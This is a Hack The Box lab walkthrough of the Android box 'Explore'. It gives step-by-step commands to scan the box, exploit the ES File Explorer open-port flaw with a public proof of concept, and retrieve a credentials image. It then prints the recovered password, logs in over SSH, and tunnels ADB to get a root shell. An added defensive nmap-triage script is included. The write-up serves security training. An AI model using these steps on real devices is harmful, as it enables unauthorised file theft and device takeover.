Explore Hackthebox Walkthrough

"Explore" is a Capture the Flag challenge that we'll be solving today. It is hosted on Hack the Box (HTB), and the box is built around ADB (Android Debug Bridge). So, let's get started and learn how to break it down successfully.

Pentesting Methodology

· Port Scanning & Enumeration

· Exploitation

· Privilege Escalation

Port Scanning & Enumeration

Nmap

Starting the full port scan

nmap -p- -sV 10.129.198.246

-p-: scan all 65535 TCP ports instead of nmap's default top 1000

-sV: probe open ports to detect the service and version



According to the nmap output, we get:

· on port 2222 an SSH server running

· on port 59777 an HTTP service running

· on port 5555 a TCP service running

Searching the internet for port 59777, the following GitHub repository comes up as the first result.
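The nmap step above is where a defender would want to catch this box's weaknesses before anyone else does. The following is an added example, not part of the original walkthrough: it parses nmap's grepable (-oG) output and flags ports that should never be reachable over the network, namely the ADB daemon (5555/tcp) and the ES File Explorer HTTP listener (59777/tcp). The report text is constructed to mirror the three ports found on the box; the risk table and the function names are this example's own assumptions, not anything from nmap or the exploit repository.

```python
"""Triage an nmap -oG report for services that should never face a network.

Added example (not from the original walkthrough). The sample report below is
constructed to mirror the ports found on the Explore box; it is not real scan
output.
"""
import re

# Constructed sample in nmap's grepable format (one "Host:" line per host).
SAMPLE_GNMAP = (
    "# Nmap scan initiated as: nmap -p- -sV -oG explore.gnmap 10.129.198.246\n"
    "Host: 10.129.198.246 ()\tPorts: 2222/open/tcp//ssh//(protocol 2.0)/, "
    "5555/open/tcp////, 59777/open/tcp//http///\tIgnored State: closed (65532)\n"
    "# Nmap done -- 1 IP address (1 host up)\n"
)

# Assumed risk policy: ports whose exposure on a phone is a finding by itself.
RISK_RULES = {
    5555: "Android Debug Bridge daemon: gives shell access to anyone who can reach it",
    59777: "ES File Explorer HTTP listener: serves device files without authentication",
}

HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\((.*?)\)\s+Ports:\s+(.*?)(?:\t|$)")


def parse_gnmap(text):
    """Return a list of port records from nmap grepable output.

    Each entry in the Ports field has the layout
    port/state/proto/owner/service/rpc/version/ ; the version text may itself
    contain slashes, so everything after the sixth slash is rejoined.
    """
    records = []
    for line in text.splitlines():
        match = HOST_LINE.match(line)
        if not match:
            continue  # comment lines and hosts with no Ports field
        host, ports_field = match.group(1), match.group(3)
        for entry in ports_field.split(", "):
            fields = entry.strip().split("/")
            if len(fields) < 6:
                continue  # malformed entry, skip rather than guess
            port, state, proto, _owner, service, _rpc = fields[:6]
            version = "/".join(fields[6:]).rstrip("/")
            records.append({
                "host": host,
                "port": int(port),
                "proto": proto,
                "state": state,
                "service": service,
                "version": version,
            })
    return records


def triage(records):
    """Return (host, port, reason) for every open port matching RISK_RULES.

    nmap sometimes identifies 5555/tcp by service name rather than port, so
    a service of "adb" on any port is treated the same as port 5555.
    """
    alerts = []
    for rec in records:
        if rec["state"] != "open":
            continue
        reason = RISK_RULES.get(rec["port"])
        if reason is None and rec["service"] == "adb":
            reason = RISK_RULES[5555]
        if reason:
            alerts.append((rec["host"], rec["port"], reason))
    return alerts


if __name__ == "__main__":
    for host, port, reason in triage(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{host}:{port}  {reason}")
```

Feed it a real report with `nmap -p- -sV -oG explore.gnmap <host>` and read the file in place of SAMPLE_GNMAP; both exposed ports on this box would be reported, which is exactly the signal a device owner needs to turn off USB debugging over the network and to stop the file manager's remote-access feature.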



Exploitation

Clone the GitHub repository onto our Kali system so that we get the exploit script.

git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

cd ESFileExplorerOpenPortVuln

ls

python poc.py

python poc.py list



The repository contains a Python exploit script that we can use to see what can be found on the device. The listing returns a file named creds.jpg; the name "creds" suggests it may contain credentials, i.e. a login ID and password that could be used for SSH later on.

python poc.py --cmd listPics --ip 10.129.198.246

python poc.py -g /storage/emulated/0/DCIM/creds.jpg --ip 10.129.198.246



Ahh, the file does contain a username and password.



Username: Kristi

Password: Kr1sT!5h@Rp3xPl0r3!

Remembering that an SSH port was open on 2222, I attempted to SSH into the machine using these credentials.

ssh kristi@10.129.198.246 -p 2222

-p: specifies the SSH port (2222 instead of the default 22)



Privilege Escalation

An ADB service is running on port 5555, and we have SSH access. Make the ADB service reachable from our machine by configuring SSH port forwarding, so that local port 5555 is tunnelled to port 5555 on the device.

ssh kristi@10.129.198.246 -p 2222 -L 5555:localhost:5555



After configuring port forwarding, I can run ADB commands against the forwarded port, obtain a shell, elevate the shell to root, and search for the root.txt file.

Note: If you don't have ADB installed on your Kali machine, install it with the command:

apt install adb

To connect with adb through the tunnel, use the following command:

adb connect 127.0.0.1:5555

With the connection established, get a shell on the device with the command given below, then switch to root and read the flag.

adb -s 127.0.0.1 shell

whoami

su

ls

cd data

cat root.txt

